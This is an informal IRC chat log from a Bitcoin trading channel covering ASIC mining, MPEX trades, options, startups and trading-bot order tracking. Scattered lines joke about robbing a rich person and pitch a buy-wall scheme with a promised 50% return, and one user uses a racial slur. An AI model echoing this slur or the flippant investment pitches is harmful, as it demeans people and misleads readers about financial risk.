indicators Dec 20 18:26:14 ahahah so EskimoBob is really an estonian undergrad with some bs archeology programme ? Dec 20 18:26:33 lmao on the interwebs all the dogs don't know they're dogs anymore. Dec 20 18:26:53 Bugpowder: my respect for you has skyrocketed Dec 20 18:27:12 I have mad respect for those in Biology Dec 20 18:27:25 thestringpuller he's a mouse brain surgeon. Dec 20 18:27:48 because mouse brains are in abundance... Dec 20 18:28:05 hmmmm Dec 20 18:29:25 There aren't that many cool applications for these arrays in a dish though. the brain isn't flat Dec 20 18:29:41 and brain slices are dying and have no connections to other areas Dec 20 18:29:46 yea, axion is still a startup Dec 20 18:29:55 it's for mainly pure research purposes Dec 20 18:30:04 the most interesting stuff you can do with the MEAs is studying retina Dec 20 18:30:09 since it lays flat Dec 20 18:30:31 for example http://chichilnisky.salk.edu/technology/index.html Dec 20 18:31:15 This company makes some useful stuff. Dec 20 18:31:16 http://www.neuronexustech.com Dec 20 18:31:35 you can record from many sites in the awake behaving brain Dec 20 18:31:46 silicon probes Dec 20 18:32:08 I have used them and also done some custom design work in house Dec 20 18:32:19 hence, not optimistic about ASIC delivery windows Dec 20 18:32:28 :-P Dec 20 18:32:33 well you know how chips are made Dec 20 18:32:35 different set of issues though. Dec 20 18:32:38 how much time goes into them Dec 20 18:32:41 for an IC Dec 20 18:33:05 just getting the probes off the chip and flat took over a year of refinement Dec 20 18:33:15 balancing the stress levels of each layer Dec 20 18:33:23 how much were the NRE costs initially? Dec 20 18:33:38 not sure if that would be an issue with commerical ASICs though Dec 20 18:33:58 $200k Dec 20 18:34:16 There is a new project that is going to do much more advanced probes with a $5M budget Dec 20 18:34:26 Damn son. Dec 20 18:34:30 collab between several funding agencys Dec 20 18:34:40 hope I get my hands on them Dec 20 18:34:40 I hope ASICS don't completely flop Dec 20 18:34:45 it's gonna tank the BTC Dec 20 18:34:51 why? Dec 20 18:34:58 it makes us all look bad? Dec 20 18:35:30 asics wont flop Dec 20 18:35:35 or well they can but in the end, nah Dec 20 18:35:48 it's totally possible to make an asic Dec 20 18:36:03 but might take time if there isnt some very good hw makers making one Dec 20 18:36:05 i agregg Dec 20 18:36:08 agree Dec 20 18:36:29 [MPEX] [S.MPOE] 9600 @ 0.00062 = 5.952 BTC [+] Dec 20 18:36:33 if you have the funding, you can get it done, eventually Dec 20 18:36:34 the ideal situation would have been for 2-3-4 companies coming to market within weeks Dec 20 18:36:37 afaik there are some stuff current btc-asic makers are fighting Dec 20 18:36:43 Bugpowder: indeed Dec 20 18:36:46 that is not going to happen with the sort of muppets doing it Dec 20 18:36:46 well Dec 20 18:36:49 there will be none in a month Dec 20 18:36:50 trust me Dec 20 18:36:52 the next best is nobody coming to market. Dec 20 18:36:58 they dont even have the chips Dec 20 18:37:20 Anduck i meant within weeks of each other, not within weeks of now Dec 20 18:37:25 ahh Dec 20 18:37:27 yeah Dec 20 18:37:30 yeah Dec 20 18:37:33 hmmm brb Dec 20 18:37:36 gotta swap train Dec 20 18:37:36 xD Dec 20 18:37:49 almost missed this train cuz of traffic Dec 20 18:38:10 ill be bach in a sec to talk bout asics n stuff Dec 20 18:38:20 we need to infiltrate more markets Dec 20 18:39:05 we spend too much time robbing each other why not just rob a really rich person Dec 20 18:39:10 and dump all that into BTC? Dec 20 18:39:27 [MPEX] [S.MPOE] 5250 @ 0.00062 = 3.255 BTC [+] Dec 20 18:40:27 thestringpuller, was it you who bitched about some rich friends that can't be convinced to go btc and instead smoke weed? Dec 20 18:40:47 YESSIR Dec 20 18:40:53 who do you think I'm going to rob Dec 20 18:41:08 thestringpuller : the 1bn dollar plan. Dec 20 18:41:38 ;;bc,diffchange Dec 20 18:41:40 Estimated percent change in difficulty this period | -13.2747973704 % based on data since last change | -15.1045589685 % based on data for last three days Dec 20 18:41:52 ;;bc,stats Dec 20 18:41:54 Current Blocks: 212920 | Current Difficulty: 3370181.7992778 | Next Difficulty At Block: 213695 | Next Difficulty In: 775 blocks | Next Difficulty In About: 6 days, 9 hours, 29 minutes, and 35 seconds | Next Difficulty Estimate: 2922796.99440957 | Estimated Percent Change: -13.2747973704 Dec 20 18:42:05 https://bitcointalk.org/index.php?action=post;quote=1411617;topic=82866.80;num_replies=91;sesc=9cd7069be27b1da97ed8dfd6976381c6 :) Dec 20 18:42:09 mircea_popescu: how do we get 1bn into BTC besides robbing someone? this is taking too long Dec 20 18:42:30 just, rich person puts a wall on mtgox, 5mn btc demanded at 200 Dec 20 18:42:39 that's the end of it, btc will never be under 3-400 after that. Dec 20 18:42:56 he gets his 2-3 mn and a 50% ROI to go along with it. Dec 20 18:43:00 Ukto, are you trying to post to btctalk as someone else or? Dec 20 18:43:15 meanwhile at the kitchen table : "i swear to god this soup makes me blush" Dec 20 18:44:18 that should be a business or a foundation Dec 20 18:44:36 the 1bn foundation (rich people give us your money so we can make a bidwall, promising 50% ROI) Dec 20 18:44:54 no Dec 20 18:44:59 it has t obe a rich guy sorta like me Dec 20 18:45:10 aka, couldn't care less about anyone else. Dec 20 18:45:14 jurov: do they get enough readers? Dec 20 18:45:35 who they? Dec 20 18:45:43 btctalk or elsewhere Dec 20 18:46:09 Ukto i got several times more visits from reddit than btctalk Dec 20 18:46:19 on what? Dec 20 18:47:58 well, i still don't know exactly what is ukto asking about Dec 20 18:48:04 mircea_popescu: why don't you care about anyone? Dec 20 18:48:08 just thrown in some observation for coinbr Dec 20 18:48:12 are you John Galt? Dec 20 18:48:16 [10:45] Ukto, are you trying to post to btctalk as someone else or? Dec 20 18:48:21 < thestringpuller> smickles: ^^^ seems possible to short even before the div's have paid<<< indeed Dec 20 18:48:27 I was just responding asking its worth it Dec 20 18:48:37 Ukto I was talking about the link you posted Dec 20 18:48:51 it smell like request forgery or whatever it's called Dec 20 18:49:08 wtf Dec 20 18:49:18 stupid forums linkerary Dec 20 18:49:31 https://bitcointalk.org/index.php?topic=82866.msg1411617#msg1411617 Dec 20 18:49:35 there, last line of his post :) Dec 20 18:50:03 ook Dec 20 18:51:18 thestringpuller i meant in the "o, what will they think what will they say will they agree" sense. Dec 20 18:51:31 sooo back to asics Dec 20 18:51:49 whatcha guess, when will the first one be ready? Dec 20 18:51:59 remember, they need to make asics, put them on a board and program the whole thing for it Dec 20 18:55:05 oh mircea_popescu you "dgaf" Dec 20 18:55:11 mircea_popescu: lets his balls hang out Dec 20 18:55:15 keeps it real like a reall nigga Dec 20 18:56:15 Anduck im pretty sure asics will be delivered by a company Dec 20 18:56:20 as opposed to the current dramawhores. Dec 20 18:56:48 yeah they will Dec 20 18:58:19 the company will need initial funding and not preorders Dec 20 18:58:49 the design needs to be done before announcement time and the fabrication needs to be happening before a ship date is even conceived Dec 20 18:59:14 BFL let their PR get out of hand and they are probably blowing money on expensive cars and shit Dec 20 19:02:08 [MPEX] [S.MPOE] 6428 @ 0.00062 = 3.9854 BTC [+] Dec 20 19:08:48 [MPEX] [S.DICE] 806 @ 0.00351012 = 2.8292 BTC [+] Dec 20 19:09:41 [MPEX] [S.DICE] 244 @ 0.00351012 = 0.8565 BTC [+] Dec 20 19:09:43 [MPEX] [S.DICE] 806 @ 0.00353878 = 2.8523 BTC [+] Dec 20 19:12:36 [MPEX] [S.DICE] 1394 @ 0.00353878 = 4.9331 BTC [+] Dec 20 19:12:38 [MPEX] [S.DICE] 376 @ 0.00355273 = 1.3358 BTC [+] Dec 20 19:14:16 [MPEX] [S.DICE] 6 @ 0.00355273 = 0.0213 BTC [+] Dec 20 19:17:12 [MPEX] [S.MPOE] 10100 @ 0.00062 = 6.262 BTC [+] Dec 20 19:21:21 [MPEX] [S.MPOE] 5000 @ 0.00062 = 3.1 BTC [+] Dec 20 19:26:47 [MPEX] [S.MPOE] 6200 @ 0.00062 = 3.844 BTC [+] Dec 20 19:27:44 [MPEX] [S.MPOE] 11800 @ 0.00062 = 7.316 BTC [+] Dec 20 19:30:17 [MPEX] [S.MPOE] 7900 @ 0.00062 = 4.898 BTC [+] Dec 20 19:33:01 lol Dec 20 19:33:08 nickserv Dec 20 19:34:45 [MPEX] [S.MPOE] 14000 @ 0.00062 = 8.68 BTC [+] Dec 20 19:35:01 graham is insane Dec 20 19:35:14 he rants about how 3/4 of their "10 bn" was made by airbnb and some other shit site Dec 20 19:35:18 what's this airbnb ? this https://www.airbnb.com/ Dec 20 19:35:26 there's one user on the site, and that's me. Dec 20 19:35:37 what does it do ? rent rooms from people. Dec 20 19:38:28 I have discovered the most wrong thing on youtube ever Dec 20 19:38:32 https://www.youtube.com/watch?v=HcfKieawVUQ Dec 20 19:39:16 Diablo-D3 ! Dec 20 19:39:21 that is so rong Dec 20 19:39:23 BUT Dec 20 19:39:29 i had some BFL-FAIL shares of yours Dec 20 19:39:34 will ya pay ! Dec 20 19:39:46 nefario hasnt published the goddamned fucking list yet Dec 20 19:39:55 the fucking 30 some BTC is sitting right here waiting to go Dec 20 19:40:06 well Dec 20 19:40:16 he did tell me how much i had shares Dec 20 19:40:22 they published the list atleast of some shares, right? Dec 20 19:40:23 yes, but he didnt tell me Dec 20 19:40:27 nope Dec 20 19:40:36 he did DMC but not di.bflsc yet Dec 20 19:40:51 ok Dec 20 19:41:01 but..!! i won Dec 20 19:41:02 xD Dec 20 19:41:10 i just asked nefario if i happened to have some shares Dec 20 19:41:14 i had forgot i had ASICMINER Dec 20 19:41:25 a lot of people won. a LOT of people lost, and they didnt even own success shares Dec 20 19:41:30 i only thought i have a little BFL-fail and BITVPS Dec 20 19:41:44 trollgrin.jpg Dec 20 19:41:50 yup Dec 20 19:42:02 =) Dec 20 19:42:04 re asicminer, friedcat is just going to launch his own exchange Dec 20 19:42:25 really? ok Dec 20 19:42:31 do u have any ASICMINER shars Dec 20 19:42:32 ?? Dec 20 19:42:46 yes Dec 20 19:42:54 (09:33) < thestringpuller> nickserv Dec 20 19:42:57 bingo Dec 20 19:43:13 Diablo-D3: aight Dec 20 19:43:21 do u have any BFL, DD3? Dec 20 19:43:40 mod6: what up Dec 20 19:43:46 I have stuff for you Dec 20 19:43:48 well sort of Dec 20 19:43:56 thestringpuller are you the puppet master? Dec 20 19:43:59 some design analysis after talking with Vorhees Dec 20 19:44:01 Anduck: NO ONE HAS ANY BFL, DOHOHOHOHOHOHOHOHOHO Dec 20 19:44:06 Anduck: no it's a reference to the godfather Dec 20 19:44:16 Diablo-D3: happy christmas man! Dec 20 19:44:23 thestringpuller: aight Dec 20 19:44:26 https://www.youtube.com/watch?v=HcfKieawVUQ&t=3m Dec 20 19:44:28 :o Dec 20 19:45:20 lol Dec 20 19:46:25 that's that Dec 20 19:48:38 thestringpuller: just workin. Dec 20 19:48:55 actually, im about to run out and see if I can get my new phone. Dec 20 19:49:09 i hate the cell companies. vzw are a bunch of savages. Dec 20 19:49:20 anyway, wish me luck. bbs :) Dec 20 19:54:58 http://trilema.com/2012/lets-have-fun-with-paul-graham/ Dec 20 19:58:59 [MPEX] [S.MPOE] 15792 @ 0.00062 = 9.791 BTC [+] Dec 20 19:59:37 It’s trading at 27 now, and the only way it ever touches IPO levels is through the continued good orifices of Fairy Godmother Bernanke. Dec 20 20:00:01 must have some good holes Dec 20 20:00:25 what is trading at 27? Dec 20 20:00:45 mircea_popescu - not a fan of ycombinator lol Dec 20 20:01:06 not anymore Dec 20 20:01:19 used to like graham 10 years ago, but by now he sounds like a stuffed manequin Dec 20 20:01:41 oh facebook at 27 Dec 20 20:01:47 that was due to aapl losing money Dec 20 20:01:59 people took money out of aapl and put it into fb and rim Dec 20 20:02:04 it is due to the fact facebook is lame. Dec 20 20:02:08 it's just myspace redux. Dec 20 20:02:15 i was saying it being at 27 Dec 20 20:02:20 it was at 14 Dec 20 20:02:20 a Dec 20 20:02:25 heh i recall when rimm was 140 Dec 20 20:02:25 even lower Dec 20 20:02:28 and i was buying puts Dec 20 20:02:34 smart guy Dec 20 20:02:40 then it was 60 Dec 20 20:02:46 i never saw puts worth 80 dollars each before. Dec 20 20:02:56 [MPEX] [S.MPOE] 3400 @ 0.00062 = 2.108 BTC [+] Dec 20 20:03:20 the iPhone destroyed the BB market Dec 20 20:03:27 or at least disrupted it Dec 20 20:03:28 it was just on the cusp Dec 20 20:03:32 iphone wasn't released yet iirc Dec 20 20:03:41 ah Dec 20 20:03:49 this was "back in the day" Dec 20 20:04:01 I had almost totally blown up my account Dec 20 20:04:06 trading options Dec 20 20:04:17 was down to $500 in front month puts in RIMM Dec 20 20:04:40 then they dropped about $20 a day for three days in a row Dec 20 20:04:43 25x gain Dec 20 20:04:49 yesssss Dec 20 20:05:15 :D Dec 20 20:05:50 [MPEX] [S.MPOE] 9500 @ 0.00062 = 5.89 BTC [+] Dec 20 20:06:09 those tyhree days were... Dec 20 20:06:10 o god. Dec 20 20:06:23 Somehow I lost all my money shorting the market with front month options in 2007 and 2008 Dec 20 20:06:28 I mean... WTF Dec 20 20:06:40 i very rarely used options. Dec 20 20:06:48 dendreon was glorius though Dec 20 20:06:52 but i literally did not have enough capital to go as short on rimm as i wanted. Dec 20 20:07:36 5 dollar 140 and 12 dollar 145 puts was much nicer than 4:1 margin on stock Dec 20 20:07:55 mircea_popescu: so how many S.MPOE are floating around the market now, I see that therea are a little under 50mn for sale right now Dec 20 20:08:14 smickles well the last announcement in nov i had 958mn iirc ? Dec 20 20:08:15 [MPEX] [S.MPOE] 8950 @ 0.00062 = 5.549 BTC [+] Dec 20 20:08:43 I would just read Denninger's blog and be like, must buy puts on CFC, Downey Dec 20 20:10:47 lol Dec 20 20:10:58 mircea_popescu: thoroughly mind numbing idiocy working its way towards the sitcom Dec 20 20:11:01 at the time i soundly despised blogs Dec 20 20:11:02 it's funny because Dec 20 20:11:05 I'm working on a sitcom about startups Dec 20 20:11:09 lol Dec 20 20:11:24 your sitcom can be either of two things : funny or successful. Dec 20 20:11:32 but im pretty sure it'll be simply not picked. Dec 20 20:11:57 yea that's the way of television, but it's more for fun Dec 20 20:12:41 i guess Dec 20 20:13:00 if you mean fun in the sense of submissive women you'd be better off doing porn than daytime tv. Dec 20 20:14:04 it's a 15 minute spot for [adult swim] Dec 20 20:15:03 this is what paul graham makes me think of these days: http://vimeo.com/41960660 Dec 20 20:17:37 the funny thing about that clip is start up businesses really do that when they get their initial funding... Dec 20 20:17:42 which is not funny at all it's just scary Dec 20 20:18:38 summary ? i don't have flahs. Dec 20 20:18:44 [MPEX] [S.MPOE] 12853 @ 0.00062 = 7.9689 BTC [+] Dec 20 20:19:22 there are no words Dec 20 20:19:23 uh Dec 20 20:19:27 guys get lots of money Dec 20 20:19:30 set up business that makes no money Dec 20 20:19:33 lots of overhead Dec 20 20:19:39 o that. yeah. Dec 20 20:19:47 in btc it is called "going legit" Dec 20 20:19:55 or else, the McStupidy gambit. Dec 20 20:20:07 and when I mean lots of overhead Dec 20 20:20:15 they hire a basketball player to sit around and shoot hoops all day Dec 20 20:20:16 for clients Dec 20 20:20:19 but they have no clients Dec 20 20:20:53 myea Dec 20 20:22:04 dropbox is kinda cool though no? Dec 20 20:22:29 cool it is Dec 20 20:22:33 billion dollars ? why ? Dec 20 20:22:57 imagine, i've never used it. Dec 20 20:23:24 you could create the same system locally using a an NFS share along with a few scripts Dec 20 20:23:30 so no, not worht billion Dec 20 20:24:50 for that matter, any webhost does what they do Dec 20 20:24:55 you make yourself a site and upload there. Dec 20 20:24:58 XD Dec 20 20:25:09 Facebook paid my tuition though Dec 20 20:25:19 well I guess put contracts paid my tuition... Dec 20 20:26:13 [MPEX] [S.MPOE] 5500 @ 0.00062 = 3.41 BTC [+] Dec 20 20:27:07 how does BTC infiltrate the physical market mr. popescu? Dec 20 20:28:17 it doesn't. Dec 20 20:28:31 it gradually but graciously allows that market to use it. Dec 20 20:28:47 so what will support BTC? digital goods? Dec 20 20:29:23 Google used to give me a page of the right answers, fast, with no clutter. Now the results seem inspired by the Scientologist principle that what's true is what's true for you. And the pages don't have the clean, sparse feel they used to. Google search results used to look like the output of a Unix utility. Now if I accidentally put the cursor in the wrong place, anything might happen. Dec 20 20:29:23 The way to win here is to build the search engine all the hackers use. A search engine whose users consisted of the top 10,000 hackers and no one else would be in a very powerful position despite its small size, just as Google was when it was that search engine. Dec 20 20:29:26 simple point of fact. Dec 20 20:29:40 me being here, a few others being here is what supports btc. Dec 20 20:29:44 rest doesn't matter. Dec 20 20:29:59 support is the wrong phrase Dec 20 20:30:05 word* Dec 20 20:30:08 grow* Dec 20 20:30:22 why do you care if it grows ? Dec 20 20:30:24 would be more like it how does it grow Dec 20 20:30:48 [MPEX] [S.DICE] 319 @ 0.00350838 = 1.1192 BTC [-] Dec 20 20:30:52 it provides more opportunities Dec 20 20:31:00 it locks out stupid people Dec 20 20:31:30 ugh. Dec 20 20:31:41 I'm looking at it wrong I suppose. Dec 20 20:33:12 possibly. succes is always the sound of the cool kids club going to shit. Dec 20 20:33:18 and it's inevitable in the sense all decay is inevitable Dec 20 20:33:27 so if you really want success, just make cool kids clubs. Dec 20 20:33:52 they'd better be REAL cool as opposed to the play=pretend, circle-jerk, self-granted cool any backwater town kids bestow upon each other for lack of alternatives. Dec 20 20:34:09 but then nothing gets done Dec 20 20:34:31 what's this, a fastfood joint ? Dec 20 20:35:29 heh, I'm a scientist I would rather see money in the hands of people like Bugpowder Dec 20 20:35:38 i would rather fund science Dec 20 20:35:44 even if it doesn't bring immediate returns Dec 20 20:35:58 [MPEX] [S.DICE] 106 @ 0.0035 = 0.371 BTC [-] Dec 20 20:36:00 [MPEX] [S.DICE] 894 @ 0.00349819 = 3.1274 BTC [-] Dec 20 20:36:38 http://www.smbc-comics.com/index.php?db=comics&id=2088#comic Dec 20 20:52:16 [MPEX] [S.MPOE] 6200 @ 0.00062 = 3.844 BTC [+] Dec 20 21:03:28 [MPEX] [S.MPOE] 2500 @ 0.00062 = 1.55 BTC [+] Dec 20 21:04:51 ;;calc (14 - 12) / 14 Dec 20 21:04:52 0.142857142857 Dec 20 21:05:11 ;;calc (14.50 - 12) / 14.50 Dec 20 21:05:12 0.172413793103 Dec 20 21:06:10 [MPEX] [S.MPOE] 4200 @ 0.00062 = 2.604 BTC [+] Dec 20 21:23:23 [MPEX] [S.MPOE] 9400 @ 0.00062 = 5.828 BTC [+] Dec 20 21:34:11 Ukto https://bitcointalk.org/index.php?topic=130117.60 Dec 20 21:40:45 [MPEX] [S.MPOE] 11000 @ 0.00062 = 6.82 BTC [+] Dec 20 21:47:11 [MPEX] [S.MPOE] 9750 @ 0.00062 = 6.045 BTC [+] Dec 20 21:49:28 [MPEX] [S.MPOE] 3300 @ 0.00062 = 2.046 BTC [+] Dec 20 21:51:18 yeah Dec 20 21:51:19 been woring on it Dec 20 21:51:25 I caused it :P Dec 20 21:51:27 so I knew it was comming Dec 20 21:54:39 what ever happened w/ pirate and btcst? did anyone ever sue him or whatever? Dec 20 21:55:01 he paid yesterday. Dec 20 21:55:27 yesterday Dec 20 21:55:36 lol Dec 20 21:55:41 pirate seemed such an easy game to play Dec 20 21:55:43 i thought mircea_popescu was just fucking with you all Dec 20 21:55:55 haha, wait.. no.. not really? really? Dec 20 21:55:57 now he's gone... Dec 20 21:56:26 http://www.youtube.com/watch?v=ONXp-vpE9eU Dec 20 21:57:00 [MPEX] [S.MPOE] 3850 @ 0.00062 = 2.387 BTC [+] Dec 20 22:01:06 [MPEX] [S.DICE] 2036 @ 0.00350019 = 7.1264 BTC [+] Dec 20 22:02:24 very appropriate lyrics Dec 20 22:02:24 (13:07) < mircea_popescu> o so pirate paid ? Dec 20 22:02:40 I thought this was a total joke. ^^^ Dec 20 22:02:41 he paid in milk. Dec 20 22:02:43 sums it up nicley :) Dec 20 22:02:49 [MPEX] [S.MPOE] 35095 @ 0.00062 = 21.7589 BTC [+] Dec 20 22:03:15 so he paid up with all the account holders? everyone still got screwed via the bonds though. Dec 20 22:04:40 lol @ vid Dec 20 22:04:58 YESTERDAY, ALL MY BTC SEEMED SO FAR AWAY Dec 20 22:05:06 NOW IT LOOKS AS THOUGH PIRATE PAID Dec 20 22:05:11 SO I BELIEVE IN YESTERDAY Dec 20 22:05:36 :D Dec 20 22:06:52 (that last part was a joke - I never gave pirate or btc&st anything) Dec 20 22:07:04 mod6 Dec 20 22:07:15 hey whats up man Dec 20 22:07:19 LOL, looks like the bitcointalk retards have opened a comedy club Dec 20 22:07:29 we should have a meeting soon Dec 20 22:07:47 I was laughing so hard that I had tears in my eyes. At least they are entertaining Dec 20 22:08:16 im always on my phone or driving when you are online Dec 20 22:08:22 Yes, good deal thestringpuller. Hmm.. I gotta check and see if I can squeeze in like an hour here... one sec. Dec 20 22:09:42 haha. im usually around, but yeah. Dec 20 22:10:54 I can take an hour after the next 50 minutes. I gotta prepare a bit for this IBM call I've got at 4. Dec 20 22:10:58 im on CDT Dec 20 22:11:18 does that work? otherwise sometime later tonight is fine too. Dec 20 22:12:26 so 1400 EST? Dec 20 22:13:26 lets see... it would be 16:00 EST Dec 20 22:13:36 that I'm availble, i have my call at 16:00 CDT Dec 20 22:14:04 No sweat, i'll come back here in a bit and try to find ya. Dec 20 22:14:36 i meant is 1400 good to meet? Dec 20 22:14:49 i will not driving then Dec 20 22:17:33 be drivig* Dec 20 22:17:36 [MPEX] [S.MPOE] 9800 @ 0.00062 = 6.076 BTC [+] Dec 20 22:22:01 ;;ticker Dec 20 22:22:01 BTCUSD ticker | Best bid: 13.52003, Best ask: 13.60699, Bid-ask spread: 0.08696, Last trade: 13.52003, 24 hour volume: 34745.59293995, 24 hour low: 13.32591, 24 hour high: 13.72000, 24 hour vwap: 13.51611 Dec 20 22:28:08 so pirate paid back, ewxpect a big sell off, time to get in first before teh panic Dec 20 22:28:21 lmao Dec 20 22:28:28 i thought the panic is because of the quantum asics Dec 20 22:28:55 that too Dec 20 22:29:12 [MPEX] [S.MPOE] 22650 @ 0.00062 = 14.043 BTC [+] Dec 20 22:29:21 I want my $10 xmas bitcoins goddamit Dec 20 22:30:15 https://bitcointalk.org/index.php?topic=131778.0 Dec 20 22:30:26 it is incredible how retarded the forum is Dec 20 22:30:30 [MPEX] [S.MPOE] 4700 @ 0.00062 = 2.914 BTC [+] Dec 20 22:31:01 well Dec 20 22:31:39 you have no idea. I was just reading what The Augustocroppo was writing. I mean, this guy.... fuuuuck :) Dec 20 22:36:13 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.24678951 = 246.7895 BTC [-] Dec 20 22:45:44 [MPEX] [S.MPOE] 9050 @ 0.00062 = 5.611 BTC [+] Dec 20 22:58:24 jurov: you about? Dec 20 22:58:37 yes? Dec 20 22:58:52 .. Dec 20 22:58:57 what exactly, are you about? Dec 20 22:58:57 :P Dec 20 22:59:28 does mpexagent return an ordernumber when it places an order on mpex? Dec 20 22:59:59 no, it would have to create one Dec 20 23:00:23 smickles: did you get receipt of my deposit? Dec 20 23:00:24 you have to call statjson and match the order later Dec 20 23:00:34 how do you associate mpexagent orders with their mpex counterparts to cancel them when desired? Dec 20 23:00:44 :P Dec 20 23:01:01 thestringpuller: yes, I take it that I didn't notify you of that? Dec 20 23:01:41 jurov: I was hoping that you had it all in one simpe function which i could draw inspiration from :| Dec 20 23:01:59 [MPEX] [S.MPOE] 7896 @ 0.00062 = 4.8955 BTC [+] Dec 20 23:01:59 that code is not in mpexagent, it's cinbr secret sauce Dec 20 23:02:06 bah, figures Dec 20 23:02:37 can I see it an buy it off of you if it fits my needs? Dec 20 23:02:44 yes Dec 20 23:02:54 what would you charge? Dec 20 23:03:11 whoa buying code Dec 20 23:03:14 lol Dec 20 23:03:30 am i seeing a code for btc transaction about go down Dec 20 23:03:34 99BTC :P Dec 20 23:03:45 thestringpuller: i've made hundreds of btc off of similar things Dec 20 23:04:28 meh, I know what I need to do, the fee for copy/pasting most of it seems too high to me jurov ;) Dec 20 23:05:28 thestringpuller: a while ago I wrote an elliot wave based multiexchange+bitcoinica trade bot Dec 20 23:05:39 it was worth a lot to some people Dec 20 23:06:31 and the guy selling it for me sold a bunch more copies than he told me about, so I could've made a lot more too :/ Dec 20 23:06:32 well, maybe you'll come back in 2 months, with foul cries about quantum order waveforms Dec 20 23:06:52 jurov: your supposed to compile it, and sell recurring licensing Dec 20 23:06:54 [MPEX] [S.MPOE] 9300 @ 0.00062 = 5.766 BTC [+] Dec 20 23:06:55 :P Dec 20 23:06:55 jurov: I promised only 6 months of support Dec 20 23:07:13 heh, jurov sry, misread that Dec 20 23:08:17 no, seriously. we can make an agreement, but i won't release it cheapy Dec 20 23:08:24 thestringpuller> whoa buying code <<< MPEx has built an ecosystem Dec 20 23:08:26 i win. Dec 20 23:08:50 :] Dec 20 23:10:37 * will raise fee to 10BTC/hr for consulting then Dec 20 23:11:04 jurov: I just want the one part that fetches an order number from a recently placed order, I don't think that's worth 99btc Dec 20 23:11:41 it's probably better for me to write it myself anyway Dec 20 23:11:48 but that's actually largest part of it Dec 20 23:11:58 'cause i'd have to adapt your code to my bot Dec 20 23:12:02 thx to mircea Dec 20 23:12:13 heh, i suppose so, isn't it Dec 20 23:12:25 mircea_popescu: why doesn't it return an order no? Dec 20 23:12:26 because it is likely the order never got an id and got executed instead Dec 20 23:12:31 it does Dec 20 23:12:39 :o Dec 20 23:12:49 when you place any order, it returns the order number in the reciept Dec 20 23:12:56 everytime Dec 20 23:12:59 have I just not noticed this? Dec 20 23:13:02 it does ? Dec 20 23:13:07 wait... Dec 20 23:13:12 oh ur right. Dec 20 23:13:15 sorry, its only in the STAT Dec 20 23:13:24 zatcly Dec 20 23:13:38 it does return a statement of what order was placed though. Dec 20 23:13:47 but yeah, no number. but this was by design. Dec 20 23:13:58 to eliminate some HFT type stuff right? Dec 20 23:14:25 not exactly. the system you're talking to has no idea/not the authority to know what order id the order will get or how will be executed Dec 20 23:14:38 and as the entire thing is stateless the only thing you can do is examine the state later Dec 20 23:16:10 ok.. i see. Dec 20 23:16:25 My original plan here was just to display the order id's through the JSONSTAT Dec 20 23:16:33 maybe jurov's is simialr? Dec 20 23:16:36 *similar Dec 20 23:17:04 mod6, you have to gather transactions, subtract them from the order you placed if they match Dec 20 23:17:11 I wonder if i can get away with a 'cancel the order that looks sorta-kinda like ' function Dec 20 23:17:17 and *then* matche the order with the list Dec 20 23:17:35 mircea_popescu: this is why mpoebot places orders for limited time, isn't it Dec 20 23:17:50 no ? Dec 20 23:17:59 orders can have expiry's or not Dec 20 23:18:12 or is that different? Dec 20 23:18:26 i mean... it'd be in any case more effiicent to place limited time orders given that the bot knows how often it runs Dec 20 23:19:38 [MPEX] [S.MPOE] 3650 @ 0.00062 = 2.263 BTC [+] Dec 20 23:20:40 bah, i would be satisfied with buying mpbor, but I suspect the thing i'm writing will be more profitabled Dec 20 23:20:46 -d Dec 20 23:21:15 i need to backtest it Dec 20 23:21:20 incidentally, i just met a friend who want to do hft bot Dec 20 23:21:38 he was enraged with mircea's anti-hft preacutions Dec 20 23:22:06 what? like no liquidity-adder rebate? Dec 20 23:22:17 isn't that how hft makes most of its money? Dec 20 23:22:31 no, the slow order placing/cancellation Dec 20 23:23:07 yeah HFT would make me leave mpex Dec 20 23:23:15 because i don't want to fight a fucking bot to place an order Dec 20 23:23:46 that article on ZH really blew my mind. i'd be like fuck it. market tis brok3d. Dec 20 23:23:57 [MPEX] [S.MPOE] 13050 @ 0.00062 = 8.091 BTC [+] Dec 20 23:24:45 everything that can be done to preserve the organic market of mpex should be Dec 20 23:25:34 it may possibly be the only real market in the world, even guys in nyc or chicago trading pits have to combat these HFTs Dec 20 23:25:39 well, damn, i don't think I can put off order number fetching any longer Dec 20 23:25:41 they hate it too Dec 20 23:26:38 cue that boromir meme "you don't simply fetch order number in mpex" Dec 20 23:26:46 lol Dec 20 23:28:07 mircea_popescu: would you not like it if I had a ~500 iteration loop which called statjson until it saw the order pop up, if at the end of the 500 iteration it haddn't, it would just assume it got executed? Dec 20 23:28:31 smickles, what i'm trying to explain, you have to account for transactions Dec 20 23:28:53 cause if half the order gets executed, only other half get an ID Dec 20 23:29:36 jurov: I know, but I'll be putting only one order up at a time, so if anything shows up with that mpsic, that's it Dec 20 23:30:23 ah, then okay. but you still have to filter txs from previous orders. Dec 20 23:30:25 no, the slow order placing/cancellation << order placing isn't slow ? Dec 20 23:30:30 it's fast! Dec 20 23:30:59 yes! it shows in statjson in only 2 to 20 seconds ! Dec 20 23:31:12 it may possibly be the only real market in the world, even guys in nyc or chicago trading pits have to combat these HFTs <<< i know. atm i actually do have an edge over nyse/etc. Dec 20 23:31:22 jurov doesn't mean it's not there tho :) Dec 20 23:31:37 bah, complications. Dec 20 23:31:43 ofc. for certain value of "fast". Dec 20 23:32:32 the twitter to assbot latency is larger than the mpex.co to order queue latency by a degree of magnitude Dec 20 23:33:00 like i'm using assbot...puhlease Dec 20 23:33:09 mircea_popescu: i agree. If I was there in the pits and my client called me to place a market order immediately and i was being front run by an algo, i'd go banananas. Dec 20 23:33:26 it seems, i'll stat, order, stat for diff untill i can reasonably assume that it was fully filled Dec 20 23:33:47 ahem *bananas Dec 20 23:33:56 :D Dec 20 23:34:00 :p Dec 20 23:34:10 yes, just that code that can "reasonably assume" it is far from trivial. Dec 20 23:34:30 [MPEX] [S.MPOE] 20900 @ 0.00062 = 12.958 BTC [+] Dec 20 23:35:31 [MPEX] [S.MPOE] 4300 @ 0.00062 = 2.666 BTC [+] Dec 20 23:35:47 w00t all promotional shares of CoinBr.MPBPT shares sold :P Dec 20 23:36:05 so you got 100 btc ? Dec 20 23:36:11 50 so far Dec 20 23:36:12 [MPEX] [S.MPOE] 10250 @ 0.00062 = 6.355 BTC [+] Dec 20 23:36:27 lmao she posted her feet Dec 20 23:36:28 ahahahaha Dec 20 23:36:43 what, like to /r/feet? Dec 20 23:37:17 https://bitcointalk.org/index.php?topic=97272.msg1411280#msg1411280 Dec 20 23:38:27 no hair? Dec 20 